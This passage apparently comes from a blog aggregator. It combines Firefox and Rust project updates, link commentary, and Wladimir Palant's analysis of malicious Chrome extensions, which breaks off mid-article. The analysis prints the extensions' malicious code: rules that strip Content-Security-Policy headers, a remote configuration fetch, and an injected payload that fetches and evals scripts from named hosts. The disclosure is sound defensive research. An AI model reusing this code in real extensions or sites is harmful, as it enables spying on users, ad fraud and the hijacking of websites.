Big-time proprietary software is breaking compatibility while independent alternatives keep on going. People lined up for Microsoft Windows 95 in 1995 and Apple iPhones in 2007, and a trade war with the USA would have been a problem for software users then, but now the EuroStack is a thing. The China stack, too, as Prof. Yu Zhou points out: China tech shrugged off Trump’s ‘trade war’ − there’s no reason it won’t do the same with new tariffs. I updated generative ai antimoats with some recent links. Even if the AI boom does catch on among users, services that use AI are more likely to use predictable independently-hosted models than to rely on Big Tech APIs that can be EOLed or nerfed at any time, or just have the price increased.)

California vs Texas Minimum Wage, 2013-2024 by Barry Ritholtz. [F]or seven years–from January 2013 to March 2020–[California and Texas quick-service restaurant] employment moved almost identically, the correlation between them 0.994. During that seven year period, however, TX had a flat $7.25/hr minimum wage while CA increased its minimum wage by 50%, from $8/hr to $12. Related: Is a Big Mac in Denmark Pricier Than in US?

What’s happening on RedNote? A media scholar explains the app TikTok users are fleeing to – and the cultural moment unfolding there Jianqing Chen covers the Xiaohongshu boom in the USA. This spontaneous convergence recalls the internet’s original dream of a global village. It’s a glimmer of hope for connection and communication in a divided world. (This is such authentic organic social that the Xiaohongshu ToS hasn’t even been translated into English yet. And not only does nobody read privacy policies (we knew that) but videos about reuniting with your Chinese spy from TikTok are a whole trend on there. One marketing company put up a page of Rules & Community Guidelines translated into English but I haven’t cross-checked it. Practice the core socialist values. and Promote scientific thinking and popularize scientific knowledge.)

Bob Sullivan reports Facebook acknowledges it’s in a global fight to stop scams, and might not be winning (The bigger global fight they’re in is a labor/management one, and when moderator jobs get less remunerative or more stressful, the users get stuck dealing with more crime.) Related: Meta AI case lawyer quits after Mark Zuckerberg’s ‘Neo-Nazi madness’; Llama depositions unsealed by Amy Castor and David Gerard. (The direct mail/database/surveillance marketing business, get-rich-quick schemes, and various right-wing political movements have been one big overlapping scene in the USA for quite a while, at least back to the Direct Mail and the Rise of the New Right days and possibly further. People in the USA get targeted for a lot of political disinformation and fraud (one scheme can be both), so the Xiaohongshu mod team will be in for a shock as scammers, trolls, and worse will follow the US users onto their platform.)

Firefox NightlyNew Year New Tab – These Weeks in Firefox: Issue 175

Highlights

  • Firefox 134 went out earlier this month!
  • A refreshed New Tab layout is being rolled out to users in the US and Canada, featuring a repositioned logo and weather widget to prioritize Web Search, Shortcuts, and Recommended Stories at the top. The update includes changes to the card UI for recommended stories and allows users with larger screens to see up to four columns, making better use of space.
    • The Firefox New Tab page is shown with the browser logo in the top-left, the weather indicator in the top-right, and 4 columns of stories rather than 3.

      Making better use of the space on the New Tab page!

  • dao enabled the ability to search for closed and saved tab groups (Bug 1936831)
  • kcochrane landed a keyboard shortcut for expanding and collapsing the new sidebar
    • Collapse/Expand sidebar (Ctrl + Alt + Z) – for Linux/Win
    • Collapse/Expand sidebar (⌃Z) – for macOS

Friends of the Firefox team

Resolved bugs (excluding employees)

Script to find new contributors from bug list

Volunteers that fixed more than one bug

  •  Karan Yadav

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • Fixed about:addons blocklist state message-bars not refreshed when the add-on active state doesn’t change along with the blocklist state (Bug 1936407)
  • Fixed a moz-toggle button related visual regression in about:addons (regression introduced from Bug 1917305 in Nightly 135 and fixed in the same release by Bug 1937627)
  • Adjusted popup notification primary button default string to match the Acorn style guide (Bug 1935726)
WebExtensions Framework
  • Fixed an add-on debugging toolbox regression on resending add-ons network requests from the DevTools Network panel (regression introduced in Nightly 134 from Bug 1754452 and fixed in Nightly 135 by Bug 1934478)
    • Thanks to Alexandre Poirot for fixing this add-on debugging regression
WebExtension APIs
  • Fixed notification API event listeners not restarting suspended extension event pages (Bug 1932263)
  • As part of the work for the MV3 userScripts API (currently locked behind a pref in Nightly 134 and 135):
    • Introduced permission warning in the Firefox Desktop about:addons extensions permissions view (Bug 1931545)
    • Introduced userScripts optional permissions request dialog on Firefox Desktop (Bug 1931548)
    • NOTE: An MV3 userScripts example extensions added to the MDN webextensions examples repo is being worked on in the following github pull request: https://github.com/mdn/webextensions-examples/pull/576
    • The permission warning in the Firefox Desktop about:addons extensions permissions view. It is showing a warning: "Unverified scripts can pose security and privacy risks, such as running harmful code or tracking website activity. Only run scripts from extensions or sources you trust."The WebExtension permission request dialog in the Firefox Desktop when installing or updating an extension is shown. It is showing a warning: "Unverified scripts can pose security and privacy risks. Only run scripts from extensions or sources you trust."

DevTools

DevTools Toolbox
WebDriver BiDi
  • External:
    • Liam (:ldebeasi) added support for the format argument to the browsingContext.captureScreenshot command. Clients can use it to specify an image format with a type such as “image/jpg” and a quality ranging between 0 and 1 (#1861737)
    • Spencer (:speneth) created a helper to check if a browsing context is a top-level browsing context (#1927829)
  • Internal:
    • Sasha landed several fixes to allow saving minidump files easily with geckodriver for both Firefox on desktop and mobile, which will allow to debug crashes more efficiently (#1882338, #1859377, #1937790)
    • Henrik enabled the remote.events.async.enabled preferences, which means we now process and dispatch action sequences in the parent process (#1922077)
    • Henrik fixed a bug with our AnimationFramePromise which could cause actions to hang if a navigation was triggered (#1937118)

Information Management

  • We’re delaying letting the new sidebar (sidebar.revamp pref) ride the trains while we address findings from user diary studies, experiments and other feedback. Stay tuned!
  • Reworked the vertical tabs mute button in Bug 1921060 – Implement the full mute button spec
  • We’re focusing on fixing papercuts for the new sidebar and vertical tabs.

Migration Improvements

  • We’ve concluded the experiment that encouraged users to create or sign-in to Mozilla accounts to sync from the AppMenu and FxA toolbar menu. We’re currently analyzing the results.
  • Before the end of 2024, we were able to get some patches into 135 that will let us try some icon variations for the signed-out state for the FxA toolbar menu button. We’ll hopefully be testing those when 135 goes out to release!

Performance Tools (aka Firefox Profiler)

  • We added a new way to filter the profile to only include the data that is related to the tab you would like to see, by adding tab selector. You can see this by clicking the “Full Profile” button on the top left corner. This allows web and gecko developers to only focus on a certain website.
    • A dropdown selector is shown above the tracks in the Firefox Profiler UI. The dropdown lists "All tabs and windows" and then "browser", followed by a list of individual domains. like "www.mozilla.org" and "www.google.com".
  • We implemented a new way to control the profiler using POSIX signals on macOS and Linux. You can send SIGUSR1 to the Firefox main process to start the profiler and SIGUSR2 to stop and dump the profile to disk. We hope that this feature will be useful for cases where Firefox is completely frozen and using the usual profiler buttons is not an option. See our documentation here.
  • Lots of performance work to make the profiler itself faster.

Search and Navigation

Scotch Bonnet

  • Mandy enhanced restricted search keywords so that users can use both their own localized language as well as the English shortcut Bug 1933003
  • Daisuke fixed an issue where pressing ctrl+shift+tab while the Unified Search Button was enabled and the address bar is focused would not go to the previous tab Bug 1931915
  • Daisuke also fixed an issue where focusing the urlbar with a click and pressing shift tab wouldn’t focus the Unified Search Button Bug 1933251
  • Daisuke enabled the keyboard focus of the Unified Search Button using Shift + Tab after focus using CTRL + L Bug 1937363
  • Daisuke changed the behavior of the Unified Search Button to show when editing a URL instead of initial focus Bug 1936090
  • Lots of other papercuts fixed by the team

Search

  • Mandy initiated the removal of old application provided search engine WebExtensions from a users profile as they no longer require them due to the usage of search-config-v2 Bug 1885953

Suggest

  • Drew implemented a new simplified UI treatment for Weather Suggestions Bug 1938517
  • Drew removed the Suggest JS Backend as the Rust based backend was enabled by default in 124 Bug 1932502

Storybook/Reusable Components

  • Anna Kulyk added new  –table-row-background-color and –table-row-background-color-alternate design tokens Bug 1919313
  • Anna Kulyk added support for the panel-item disabled attribute Bug 1919122

Mozilla Localization (L10N)L10n report: January 2025 Edition

Please note some of the information provided in this report may be subject to change as we are sometimes sharing information about projects that are still in early stages and are not final yet. 

Welcome!

Are you a locale leader and want us to include new members in our upcoming reports? Contact us!

New content and projects

What’s new or coming up in Firefox desktop

Tab Groups

Tab groups are now available in Nightly 136! To create a group in Nightly, all you have to do is have two tabs open, click and drag one tab to the other, pause a sec and then drop. From there the tab group editor window will appear where you can name the group and give it a color. After saving, the group will appear on your tab bar.

Once you create a group, you can easily access your groups from the overflow menu on the right.

 

These work great in the sidebar and vertical tabs feature that was released in the Firefox Labs feature in Nightly 131!

New profile selector

The new profile selector which we have been localizing over the previous months is now starting to roll out gradually to users in Nightly 136. SUMO has an excellent article about all the new changes which you can find here.

What’s new or coming up in web projects

AMO and AMO Frontend

The team is planning to migrate/copy the Spanish (es) locale into four: es-AR, es-CL, es-ES, and es-MX. Per the community managers’ input, all locales will retain the suggestions that have not been approved at the time of migration. Be on the lookout for the changes in the upcoming week(s).

Mozilla Accounts

The Mozilla accounts team recently landed strings used in three emails planned to be sent over the course of 90 days, with the first happening in the coming weeks. These will be sent to inactive users who have not logged in or interacted with the Mozilla accounts service in 2 years, letting them know their account and data may be deleted.

What’s new or coming up in SUMO

The CX team is still working on 2025 planning. In the meantime, read a recap from our technical writer, Lucas Siebert about how 2024 went in this blog post. We will also have a community call coming up on Feb 5th at 5 PM UTC. Check out the agenda for more detail and we’d love to see you there!

Last but not least, we will be at FOSDEM 2025. Mozilla’s booth will be at the K building, level 1. Would love to see you if you’re around!

What’s new or coming up in Pontoon

New Email Features

We’re excited to announce two new email features that will keep you better informed and connected with your localization work on Pontoon:

Email Notifications: Opt in to receive notifications via email, ensuring you stay up to date with important events even when you’re away from the platform. You can choose between daily or weekly digests and subscribe to specific notification types only.

Monthly Activity Summary: If enabled, you’ll receive an email summary at the start of each month, highlighting your personal activity and key activities within your teams for the previous month.

Visit your settings to explore and activate these features today!

New Translation Memory tools are here!

If you are a locale manager or translator, here’s what you can do from the new TM tab on your team page:

  • Search, edit, and delete Translation Memory entries with ease.
  • Upload .TMX files to instantly share your Translation Memories with your team.

These tools are here to save you time and boost the quality of suggestions from Machinery. Dive in and explore the new features today!

Moving to GitHub Discussions

Feedback, support and conversations on new Pontoon developments have moved from Discourse to GitHub Discussions. See you there!

Newly published localizer facing documentation

Events

Come check out our end of year presentation on Pontoon! A Youtube link and AirMozilla link are available.

Want to showcase an event coming up that your community is participating in? Contact us and we’ll include it.

Friends of the Lion

Know someone in your l10n community who’s been doing a great job and should appear here? Contact us and we’ll make sure they get a shout-out!

Useful Links

Questions? Want to get involved?

If you want to get involved, or have any question about l10n, reach out to:

Did you enjoy reading this report? Let us know how we can improve it.

Firefox NightlyFirefox on macOS: now smaller and quicker to install!

Firefox is typically installed on macOS by downloading a DMG (Disk iMaGe) file, and dragging the Firefox.app into /Applications. These DMG files are compressed to reduce download time. As of Firefox 136, we’re making an under the hood change to them, and switching from bzip2 to lzma compression, which shrinks their size by ~9% and cuts decompression time by ~50%.

Why now?

If you’re familiar with macOS packaging, you’ll know that LZMA support was introduced in macOS 10.15, all the way back in 2015. However, Firefox continued to support older versions of macOS until Firefox 116.0 was released in August 2023, which meant that we couldn’t use it prior to then.

But that still begs the question: why wait ~18 months later to realize these improvements? Answering that question requires a bit of explanation of how we package Firefox…

Packaging Firefox for macOS… on Linux!

Most DMGs are created with hdiutil, a standard tool that ships with macOS. hdiutil is a fine tool, but unfortunately, it only runs natively on macOS. This a problem for us, because we package Firefox thousands of times per day, and it is impractical to maintain a fleet of macOS machines large enough to support this. Instead, we use libdmg-hfsplus, a 3rd party tool that runs on Linux, to create our DMGs. This allows us to scale these operations as much as needed for a fraction of the cost.

Why now, redux

Until recently, our fork of libdmg-hfsplus only supported bzip2 compression, which of course made it impossible for us to use lzma. Thanks to some recent efforts by Dave Vasilevsky, a wonderful volunteer who previously added bzip2 support, it now supports lzma compression.

We quietly enabled this for Firefox Nightly in 135.0, and now that it’s had some bake time there, we’re confident that it’s ready to be shipped on Beta and Release.

Why LZMA?

DMGs support many types of compression: bzip2, zlib, lzfse and lzma being the most notable. Each of these has strengths and weaknesses:

  • bzip2 has the best compression (in terms of size) that is supported on all macOS versions, but the slowest decompression
  • zlib has very fast decompression, at the cost of increased package size
  • lzfse has the fastest decompression, but the second largest package size
  • lzma has the second fastest decompression and the best compression in terms of size, at the cost of increased compression times

With all of this in mind, we chose lzma to make improvements on both download size and installation time.

You may wonder why download size is an important consideration, seeing as fast broadband connections are common these days. This may be true in many places, but not everyone has the benefits of a fast unmetered connection. Reducing download size has an outsized impact for users with slow connections, or those who pay for each gigabyte used.

What does this mean for you?

Absolutely nothing! Other than a quicker installation experience, you should see absolutely no changes to the Firefox installation experience.

Of course, edge cases exist and bugs are possible. If you do notice something that you think may be related to this change please file a bug or post on discourse to bring it to our attention.

Get involved!

If you’d like to be like Dave, and contribute to Firefox development, take a look at codetribute.mozilla.org. Whether you’re interested in automation and tools, the Firefox frontend, the Javascript engine, or many other things, there’s an opportunity waiting just for you!

Mozilla Addons BlogAnnouncing the WebExtensions ML API

Greetings extension developers!

We wanted to highlight this just-published blog post from our AI team where they share some exciting news – we’re shipping a new experimental ML API in Firefox that will allow developers to leverage our AI Runtime to run offline machine learning tasks in their web extensions.

Head on over to Mozilla’s AI blog to learn more. After you’ve had a chance to check it out, we encourage you to share feedback, comments, or questions over on the Mozilla AI Discord (invite link).

Happy coding!

The post Announcing the WebExtensions ML API appeared first on Mozilla Add-ons Community Blog.

The Rust Programming Language BlogDecember Project Goals Update

Over the last six months, the Rust project has been working towards a slate of 26 project goals, with 3 of them designated as Flagship Goals. This post provides a final update on our progress towards these goals (or, in some cases, lack thereof). We are currently finalizing plans for the next round of project goals, which will cover 2025H1. The full details for any particular goal are available in its associated tracking issue on the rust-project-goals repository.

Flagship goals

Our big goal for this period was async closures, and we are excited to announce that work there is done! Stable support for async closures landed on nightly on Dec 12 and it will be included in Rust 1.85, which ships on Feb 20. Big kudos to compiler-errors for driving that.

For our other goals, we made progress, but there remains work to be done:

  • Return Type Notation (RTN) is implemented and we had a call for experimentation but it has not yet reached stable. This will be done as part of our 2025H1 goal.
  • Async Functions in Traits (and Return Position Impl Trait in Trait) are currently not consided dyn compatible. We would eventually like to have first-class dyn support, but as an intermediate step we created a procedural macro crate dynosaur1 that can create wrappers that enable dynamic dispatch. We are planning a comprehensive blog post in 2025H1 that shows how to use this crate and lays out the overall plan for async functions in traits.
  • Work was done to prototype an implementation for async drop but we didn't account for reviewing bandwidth. nikomatsakis has done initial reads and is working with PR author to get this done in 2025H1. To be clear though the scope of this is an experiment with the goal of uncovering implementation hurdles. There remains significant language design work before this feature would be considered for stabilization (we don't even have an RFC, and there are lots of unknowns remaining).
  • We have had fruitful discussions about the trait for async iteration but do not have widespread consensus, that's on the docket for 2025H1.

We largely completed our goal to stabilize the language features used by the Rust for Linux project. In some cases a small amount of work remains. Over the last six months, we...

  • stabilized the offset_of! macro to get the offset of fields;
  • almost stabilized the CoercePointee trait -- but discovered that the current implementaton was revealing unstable details, which is currently being resolved;
  • asm_goto stabilization PR and reference updates are up, excluding the "output" feature.
  • completed the majority of the work for arbitrary self types, which is being used by RfL and just needs documentation before stabilisation

We also began work on compiler flag stabilization with RFC 3716, which outlines a scheme for stabilizing flags that modify the target ABI.

Big shout-outs to Ding Xiang Fei, Alice Ryhl, Adrian Taylor, and Gary Guo for doing the lion's share of the work here.

The final release of Rust 2024 is confirmed for February 20, 2025 as part of Rust 1.85. Rust 1.85 is currently in beta. Feedback from the nightly beta and crater runs has been actively addressed, with adjustments to migrations and documentation to enhance user experience.

Big shout-outs to TC and Eric Huss for their hard work driving this program forward.

Final goal updates

Over the last six months a number of internal refactorings have taken place that are necessary to support a min_generic_const_args prototype.

One refactoring is that we have changed how we represent const arguments in the compiler to allow for adding a separate representation for the kinds of const arguments that min_generic_const_args will add.

Another big refactoring is that we have changed the API surface for our representation of const arguments in the type system layer, there is no longer a way to evaluate a const argument without going through our general purpose type system logic. This was necessary to ensure that we correctly handle equality of the kinds of const arguments that min_generic_const_args will support.

With all of these pre-requisite refactorings completed, a feature gate has been added to the compiler (feature(min_generic_const_args)) that uses the new internal representation of const arguments. We are now beginning to implement the actual language changes under this feature gate.

Shout-out to camelid, boxy and compiler-errors.

Over the course of the last six months...

  • cargo semver-checks began to include generic parameters and bounds in its schema, allowing for more precise lints;
  • cargo manifest linting was implemented and merged, allowing for lints that look at the cargo manifest;
  • building on cargo manifest linting, the feature_missing lint was added, which identifies breakage caused by the removal of a package feature.

In addition, we fleshed out a design sketch for the changes in rustdoc's JSON support that are needed to support cross-crate item linting. This in turn requires compiler extensions to supply that information to rustdoc.

  • Progress was made on adding const traits and implementation in the compiler, with improvements being carefully considered. Add was constified in rust#133237 and Deref/DerefMut in rust#133260.
  • Further progress was made on implementing stability for the const traits feature in rust#132823 and rust#133999, with additional PRs constifying more traits open at rust#133995 and rust#134628.
  • Over the last six months, we created a lang-team experiment devoted to this issue and spastorino began work on an experimental implementation. joshtriplett authored RFC 3680, which has received substantial feedback. The current work is focused on identifying "cheaply cloneable" types and making it easy to create closures that clone them instead of moving them.
  • Alternatives to sandboxed build scripts are going to be investigated instead of continuing this project goal into 2025h1 - namely, declaratively configuring system dependencies with system-deps, using an approach similar to code-checker Cackle and its sandbox environment Bubblewrap, or fully-sandboxed build environments like Docker or Nix.
  • Significant speedups have been achieved, reducing the slowest crate resolution time from over 120 seconds to 11 seconds, and decreasing the time to check all crates from 178 minutes to 71.42 minutes.
  • Performance improvements have been made to both the existing resolver and the new implementation, with the lock file verification time for all crates reduced from 44.90 minutes to 32.77 minutes (excluding some of the hardest cases).
  • Our pull request adding example searches and adding a search button has been added to the agenda for the rustdoc team next meeting.
  • The -Znext-solver=coherence stabilization is now stable in version 1.84, with a new update blogpost published.
  • Significant progress was made on bootstrap with -Znext-solver=globally. We're now able to compile rustc and cargo, enabling try-builds and perf runs.
  • An optimisation for the #[clippy::msrv] lint is open, benchmarked, and currently under review.
  • Help is needed on any issue marked with performance-project, especially on issue #13714.
  • Over the course of this goal, Nadrieril wrote and posted the never patterns RFC as an attempt to make progress without figuring out the whole picture, and the general feedback was "we want to see the whole picture". Next step will be to write up an RFC that includes a clear proposal for which empty patterns can and cannot be omitted. This is 100% bottlenecked on my own writing bandwidth (reach out if you want to help!). Work will continue but the goal won't be resubmitted for 2025h1.
  • Amanda has made progress on removing placeholders, focusing on lazy constraints and early error reporting, as well as investigating issues with rewriting type tests; a few tests are still failing, and it seems error reporting and diagnostics will be hard to keep exactly as today.
  • @lqd has opened PRs to land the prototype of the location-sensitive analysis. It's working well enough that it's worthwhile to land; there is still a lot of work left to do, but it's a major milestone, which we hoped to achieve with this project goal.
  • A fix stopping cargo-script from overriding the release profile was posted and merged.
  • Help is wanted for writing frontmatter support in rustc, as rustfmt folks are requesting it to be represented in the AST.
  • RFC is done, waiting for all rustdoc team members to take a look before implementation can start.
  • SparrowLii proposed a 2025H1 project goal to continue stabilizing the parallel front end, focusing on solving reproducible deadlock issues and improving parallel compilation performance.
  • The team discussed solutions to avoid potential deadlocks, finding that disabling work-stealing in rayon's subloops is effective, and will incorporate related modifications in a PR.
  • Progress on annotate-snippets continued despite a busy schedule, with a focus on improving suggestions and addressing architectural challenges.
  • A new API was designed in collaboration with epage, aiming to align annotate-snippets more closely with rustc for easier contribution and integration.
  • The project goal slate for 2025h1 has been posted as an RFC and is waiting on approval from project team leads.
  • Another pull request was merged with only one remaining until a working MVP is available on nightly.
  • Some features were removed to simplify upstreaming and will be added back as single PRs.
  • Will start work on batching feature of LLVM/Enzyme which allows Array of Struct and Struct of Array vectorisation.
  • There's been a push to add a AMD GPU target to the compiler which would have been needed for the LLVM offload project.
  • We have written and verified around 220 safety contracts in the verify-rust-std fork.
  • 3 out of 14 challenges have been solved.
  • We have successfully integrated Kani in the repository CI, and we are working on the integration of 2 other verification tools: VeriFast and Goto-transcoder (ESBMC)
  • There wasn't any progress on this goal, but building a community around a-mir-formality is still a goal and future plans are coming.

Goals without updates

The following goals have not received updates in the last month:

  1. As everyone knows, the hardest part of computer-science is naming. I think we rocked this one.

Wladimir PalantMalicious extensions circumvent Google’s remote code ban

As noted last week I consider it highly problematic that Google for a long time allowed extensions to run code they downloaded from some web server, an approach that Mozilla prohibited long before Google even introduced extensions to their browser. For years this has been an easy way for malicious extensions to hide their functionality. When Google finally changed their mind, it wasn’t in form of a policy but rather a technical change introduced with Manifest V3.

As with most things about Manifest V3, these changes are meant for well-behaving extensions where they in fact improve security. As readers of this blog probably know, those who want to find loopholes will find them: I’ve already written about the Honey extension bundling its own JavaScript interpreter and malicious extensions essentially creating their own programming language. This article looks into more approaches I found used by malicious extensions in Chrome Web Store. And maybe Google will decide to prohibit remote code as a policy after all.

Screenshot of a Google webpage titled “Deal with remote hosted code violations.” The page text visible in the screenshot says: Remotely hosted code, or RHC, is what the Chrome Web Store calls anything that is executed by the browser that is loaded from someplace other than the extension's own files. Things like JavaScript and WASM. It does not include data or things like JSON or CSS.

Update (2025-01-20): Added two extensions to the bonus section. Also indicated in the tables which extensions are currently featured in Chrome Web Store.

Update (2025-01-21): Got a sample of the malicious configurations for Phoenix Invicta extensions. Added a section describing it and removed “But what do these configurations actually do” section. Also added a bunch more domains to the IOCs section.

Update (2025-01-28): Corrected the “Netflix Party” section, Flipshope extension isn’t malicious after all. Also removed the attribution subsection here.

Summary of the findings

This article originally started as an investigation into Phoenix Invicta Inc. Consequently, this is the best researched part of it. While I could attribute only 14 extensions with rather meager user numbers to Phoenix Invicta, that’s likely because they’ve only started recently. I could find a large number of domain names, most of which aren’t currently being used by any extensions. A few are associated with extensions that have been removed from Chrome Web Store but most seem to be reserved for future use.

It can be assumed that these extensions are meant to inject ads into web pages, yet Phoenix Invicta clearly put some thought into plausible deniability. They can always claim their execution of remote code to be a bug in their otherwise perfectly legitimate extension functionality. So it will be interesting to see how Google will deal with these extensions, lacking (to my knowledge) any policies that apply here.

The malicious intent is a bit more obvious with Netflix Party and related extensions. This shouldn’t really come as a surprise to Google: the most popular extension of the group was a topic on this blog back in 2023, and a year before that McAfee already flagged two extensions of the group as malicious. Yet here we are, and these extensions are still capable of spying, affiliate fraud and cookie stuffing as described by McAfee. If anything, their potential to do damage has only increased.

Finally, the group of extensions around Sweet VPN is the most obviously malicious one. To be fair, what these extensions do is probably best described as obfuscation rather than remote code execution. Still, they download extensive instructions from their web servers even though these aren’t too flexible in what they can do without requiring changes to the extension code. Again there is spying on the users and likely affiliate fraud as well.

In the following sections I will be discussing each group separately, listing the extensions in question at the end of each section. There is also a complete list of websites involved in downloading instructions at the end of the article.

Phoenix Invicta

Let’s first take a look at an extension called “Volume Booster - Super Sound Booster.” It is one of several similar extensions and it is worth noting that the extension’s code is neither obfuscated nor minified. It isn’t hiding any of its functionality, relying on plausible deniability instead.

For example, in its manifest this extension requests access to all websites:

"host_permissions": [
  "http://*/*",
  "https://*/*"
],

Well, it obviously needs that access because it might have to boost volume on any website. Of course, it would be possible to write this extension in a way that the activeTab permission would suffice. But it isn’t built in this way.

Similarly, one could easily write a volume booster extension that doesn’t need to download a configuration file from some web server. In fact, this extension works just fine with its default configuration. But it will still download its configuration roughly every six hours just in case (code slightly simplified for readability):

let res = await fetch(`https://super-sound-booster.info/shortcuts?uuid=${userId}`,{
    method: 'POST',
    body: JSON.stringify({installParams}),
    headers: { 'Content-Type': 'text/plain' }
});
let data = await res.json();
if (data.shortcuts) {
    chrome.storage.local.set({
        shortcuts: {
            list: data.shortcuts,
            updatedAt: Date.now(),
        }
    });
}
if (data.volumeHeaders) {
    chrome.storage.local.set({
        volumeHeaderRules: data.volumeHeaders
    });
}
if (data.newsPage) {
    this.openNewsPage(data.newsPage.pageId, data.newsPage.options);
}

This will send a unique user ID to a server which might then respond with a JSON file. Conveniently, the three possible values in this configuration file represent three malicious functions of the extensions.

Injecting HTML code into web pages

The extension contains a default “shortcut” which it will inject into all web pages. It can typically be seen in the lower right corner of a web page:

Screenshot of a web page footer with the Privacy, Terms and Settings links. Overlaying the latter is a colored diagonal arrow with a rectangular pink border.

And if you move your mouse pointer to that button a message shows up:

Screenshot of a web page footer. Overlaying it is a pink pop-up saying: To go Full-Screen, press F11 when watching a video.

That’s it, it doesn’t do anything else. This “feature” makes no sense but it provides the extension with plausible deniability: it has a legitimate reason to inject HTML code into all web pages.

And of course that “shortcut” is remotely configurable. So the shortcuts value in the configuration response can define other HTML code to be injected, along with a regular expression determining which websites it should be applied to.

“Accidentally” this HTML code isn’t subject to the remote code restrictions that apply to browser extensions. After all, any JavaScript code contained here would execute in the context of the website, not in the context of the extension. While that code wouldn’t have access to the extension’s privileges, the end result is pretty much the same: it could e.g. spy on the user as they use the web page, transmit login credentials being entered, inject ads into the page and redirect searches to a different search engine.

Abusing declarativeNetRequest API

There is only a slight issue here: a website might use a security mechanism called Content Security Policy (CSP). And that mechanism can for example restrict what kind of scripts are allowed to run on the web site, in the same way the browser restricts the allowed scripts for the extension.

The extension solves this issue by abusing the immensely powerful declarativeNetRequest API. Looking at the extension manifest, a static rule is defined for this API:

[
    {
        "id": 1,
        "priority": 1,
        "action": {
            "type": "modifyHeaders",
            "responseHeaders": [
                { "header": "gain-id", "operation": "remove" },
                { "header": "basic-gain", "operation": "remove" },
                { "header": "audio-simulation-64-bit", "operation": "remove" },
                { "header": "content-security-policy", "operation": "remove" },
                { "header": "audio-simulation-128-bit", "operation": "remove" },
                { "header": "x-frame-options", "operation": "remove" },
                { "header": "x-context-audio", "operation": "remove" }
            ]
        },
        "condition": { "urlFilter": "*", "resourceTypes": ["main_frame","sub_frame"] }
    }
]

This removes a bunch of headers from all HTTP responses. Most headers listed here are red herrings – a gain-id HTTP header for example doesn’t really exist. But removing Content-Security-Policy header is meant to disable CSP protection on all websites. And removing X-Frame-Options header disables another security mechanism that might prevent injecting frames into a website. This probably means that the extension is meant to inject advertising frames into websites.

But these default declarativeNetRequest rules aren’t the end of the story. The volumeHeaders value in the configuration response allows adding more rules whenever the server decides that some are needed. As these rules aren’t code, the usual restrictions against remote code don’t apply here.

The name seems to suggest that these rules are all about messing with HTTP headers. And maybe this actually happens, e.g. adding cookie headers required for cookie stuffing. But judging from other extensions the main point is rather preventing any installed ad blockers from blocking ads displayed by the extension. Yet these rules provide even more damage potential. For example, declarativeNetRequest allows “redirecting” requests which on the first glance is a very convenient way to perform affiliate fraud. It also allows “redirecting” requests when a website loads a script from a trusted source, making it get a malicious script instead – another way to hijack websites.

Side-note: This abuse potential is the reason why legitimate ad blockers, while downloading their rules from a web server, never make these rules as powerful as the declarativeNetRequest API. It’s bad enough that a malicious rule could break the functionality of a website, but it shouldn’t be able to spy on the user for example.

Opening new tabs

Finally, there is the newsPage value in the configuration response. It is passed to the openNewsPage function which is essentially a wrapper around tabs.create() API. This will load a page in a new tab, something that extension developers typically use for benign things like asking for donations.

Except that Volume Booster and similar extensions don’t merely take a page address from the configuration but also some options. Volume Booster will take any options, other extensions will sometimes allow only specific options instead. One option that the developers of these extensions seem to particularly care about is active which allows opening tabs in background. This makes me suspect that the point of this feature is displaying pop-under advertisements.

The scheme summarized

There are many extensions similar to Volume Booster. The general approach seems to be:

  1. Make sure that the extension has permission to access all websites. Find a pretense why this is needed – or don’t, Google doesn’t seem to care too much.
  2. Find a reason why the extension needs to download its configuration from a web server. It doesn’t need to be convincing, nobody will ever ask why you couldn’t just keep that “configuration” in the extension.
  3. Use a part of that configuration in HTML code that the extension will inject in web pages. Of course you should “forget” to do any escaping or sanitization, so that HTML injection is possible.
  4. Feed another part of the configuration to declarativeNetRequest API. Alternatively (or additionally), use static rules in the extension that will remove pesky security headers from all websites, nobody will ask why you need that.

Not all extensions implement all of these points. With some of the extensions the malicious functionality seems incomplete. I assume that it isn’t being added all at once, instead the support for malicious configurations is added slowly to avoid raising suspicions. And maybe for some extensions the current state is considered “good enough,” so nothing is to come here any more.

The payload

After I already published this article I finally got a sample of the malicious “shortcut” value, to be applied on all websites. Unsurprisingly, it had the form:

<img height="1" width="1" src="data:image/gif;base64,…"
     onload="(() => {…})();this.remove()">

This injects an invisible image into the page, runs some JavaScript code via its load event handler and removes the image again. The JavaScript code consists of two code blocks. The first block goes like this:

if (isGoogle() || isFrame()) {
    hideIt();
    const script = yield loadScript();
    if (script) {
        window.eval.call(window, script);
        window.gsrpdt = 1;
        window.gsrpdta = '_new'
    }
}

The isGoogle function looks for a Google subdomain and a query – this is about search pages. The isFrame function looks for frames but excludes “our frames” where the address contains all the strings q=, frmid and gsc.page. The loadScript function fetches a script from https://shurkul[.]online/v1712/g1001.js. This script then injects a hidden frame into the page, loaded either from kralforum.com.tr (Edge) or rumorpix.com (other browsers). There is also some tracking to an endpoint on dev.astralink.click but the main logic operating the frame is in the other code block.

The second code block looks like this (somewhat simplified for readability):

if (window.top == window.self) {
    let response = await fetch('https://everyview.info/c', {
        method: 'POST',
        body: btoa(unescape(encodeURIComponent(JSON.stringify({
            u: 'm5zthzwa3mimyyaq6e9',
            e: 'ojkoofedgcdebdnajjeodlooojdphnlj',
            d: document.location.hostname,
            t: document.title,
            'iso': 4
        })))),
        headers: {
            'Content-Type': 'text/plain'
        },
        credentials: 'include'
    });
    let text = await response.text();
    runScript(decodeURIComponent(escape(atob(text))));
} else {
    window.addEventListener('message', function(event) {
        event && event.data && event.data.boosterWorker &&
            event.data.booster && runScript(event.data.booster);
    });
}

So for top-level documents this downloads some script from everyview.info and runs it. That script in turn injects another script from lottingem.com. And that script loads some ads from gulkayak.com or topodat.info as well as Google ads, makes sure these are displayed in the frame and positions the frame above the search results. The result are ads which can be barely distinguished from actual search results, here is what I get searching for “amazon” for example:

Screenshot of what looks like Google search results, e.g. a link titled “Amazon Produkte - -5% auf alle Produkte”. The website mentioned above it is conrad.de however rather than amazon.de.

The second code block also has some additional tracking going to doubleview.online, astato.online, doublestat.info, triplestat.online domains.

The payloads I got for the Manual Finder 2024 and Manuals Viewer extensions are similar but not identical. In particular, these use fivem.com.tr domain for the frame. But the result is essentially the same: ads that are almost impossible to distinguish from the search results. In this screenshot the link at the bottom is a search result, the one above it is an ad:

Screenshot of search results. Above a link titled “Amazon - Import US to Germany” with the domain myus.com. Below an actual Amazon.de link. Both have exactly the same visuals.

Who is behind these extensions?

